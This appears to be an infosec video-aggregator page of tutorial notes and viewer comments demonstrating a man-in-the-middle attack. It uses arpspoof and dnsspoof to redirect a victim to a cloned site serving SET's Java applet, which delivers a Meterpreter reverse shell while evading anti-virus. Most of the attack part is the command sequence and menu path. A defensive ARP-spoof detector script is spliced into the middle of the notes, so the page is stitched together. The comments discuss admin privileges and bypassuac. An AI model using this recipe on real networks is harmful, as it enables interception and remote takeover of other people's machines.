Description: Demonstration of SET's Java Applet Attack to bypass anti-virus software and obtain Meterpreter shell.
Video Notes:
ifconfig (View NIC information)
macchanger -a eth0 (Change MAC Address)
nmap -sn -n 10.10.100.* | grep Nmap (Scan for hosts)
route -n (Identify the Gateway)
10.10.100.254 (Gateway)
10.10.100.30 (Attacker)
10.10.100.16 (Victim)
ping 10.10.100.16 (Verify Connectivity)
echo 1 > /proc/sys/net/ipv4/ip_forward (Enables IP forwarding)
cat /proc/sys/net/ipv4/ip_forward (View status of IP forwarding)
pico dns (Create DNS table for dnsspoof)
arpspoof -i eth0 -t 10.10.100.254 10.10.100.16 (Man in the middle attack part 1)
arpspoof -i eth0 -t 10.10.100.16 10.10.100.254 (Man in the middle attack part 2)
dnsspoof -i eth0 -f dns (Website Redirect)
SET menu
1 -> Social Engineering Attacks
2 -> Website Attack Vectors
1 -> Java Applet Attack Method
2 -> Website Cloner
13 -> ShellCodeExec Alphanum Shellcode
1 -> Windows Meterpreter Reverse TCP
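A defender-side check for the two arpspoof steps listed above, added here as an example and not part of the video: it replays constructed ARP replies (the MACs are made up; only the IP addresses come from the notes) against a known-good ARP table and flags the gateway and victim IPs being claimed by one other MAC, which is exactly the footprint of a two-sided ARP spoof.

```python
from collections import defaultdict

# Known-good ARP table for this network, using the addresses from the notes.
# The MAC values are constructed for the example, not real hardware addresses.
BASELINE = {
    "10.10.100.254": "00:11:22:aa:bb:01",  # gateway
    "10.10.100.16": "00:11:22:aa:bb:16",   # victim
}

# Constructed ARP replies as (seconds, sender IP, sender MAC); not a real capture.
SAMPLE_ARP_REPLIES = [
    (0, "10.10.100.254", "00:11:22:aa:bb:01"),  # gateway answers for itself
    (1, "10.10.100.16", "00:11:22:aa:bb:16"),   # victim answers for itself
    (2, "10.10.100.30", "00:11:22:aa:bb:30"),   # third host, its own IP
    (5, "10.10.100.254", "00:11:22:aa:bb:30"),  # gateway IP claimed by the third host's MAC
    (5, "10.10.100.16", "00:11:22:aa:bb:30"),   # victim IP claimed by the same MAC
    (6, "10.10.100.254", "00:11:22:AA:BB:30"),  # repeat, different letter case
]


def detect_arp_spoof(replies, baseline):
    """Return alert dicts for replies that contradict the baseline and for any
    MAC that answers for more than one IP. Each (ip, mac) mismatch and each
    multi-IP MAC is reported once so repeated spoofed replies do not flood output."""
    alerts = []
    ips_by_mac = defaultdict(set)
    seen_mismatch = set()
    reported_multi = set()
    for ts, ip, mac in replies:
        mac = mac.lower()  # normalise case before comparing
        expected = baseline.get(ip)
        if expected is not None and mac != expected.lower() and (ip, mac) not in seen_mismatch:
            seen_mismatch.add((ip, mac))
            alerts.append({"time": ts, "kind": "ip_mac_mismatch", "ip": ip,
                           "mac": mac, "expected": expected.lower()})
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) > 1 and mac not in reported_multi:
            reported_multi.add(mac)
            alerts.append({"time": ts, "kind": "mac_claims_multiple_ips",
                           "mac": mac, "ips": sorted(ips_by_mac[mac])})
    return alerts


def suspect_macs(alerts):
    """MACs named in any alert; a MITM host appears in both alert kinds."""
    return {a["mac"] for a in alerts}


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_REPLIES, BASELINE):
        print(alert)
```

On a real host the baseline would come from an ARP table recorded before the incident and the replies from a packet capture; a static ARP entry for the gateway on the victim removes the mismatch entirely.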
I apologize in advance for the poor editing and TTS narrator. My next videos should be better.
Thanks
Tags: metasploit, meterpreter, arpspoof, dnsspoof, bypass AV, MITM
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Clear and interesting - thank you.
I have a couple of questions:
1. The victim was logged in as Admin. Would it succeed if it had been a non-Admin account?
2. You mentioned making the attack cleaner by customizing the Java applet to include only the required payload. You mentioned learning how to do this attack with Metasploit. Would you consider running through this in a future video?
I'm looking forward to your future contributions.
Yep - very clear and nice, please continue the series ;)
Had no idea SET now included shellcodeexec - but a couple of months back I remember compiling and testing this code snippet with metasploit payloads:
https://github.com/inquisb/shellcodeexec
@Ignatius - check the text in the link above to get an idea of how this works, I guess SET uses something like this.
@Ignatius
I verified whether the attack would work if the victim wasn't an administrator... the attack failed. When I tried to run the "bypassuac" script, the victim received a prompt for the admin password. If this is possible, it's above my realm of knowledge.
I'll be making more videos :)
I really enjoyed your video, there was no music (quite stupid to make a tutorial and then have some techno/rnb in the background :/).
And you described it very well, looking forward! <3
continue! they are useful :)
Good video. I like that you show everything up to date and that you don't need a completely unpatched system to pull this off.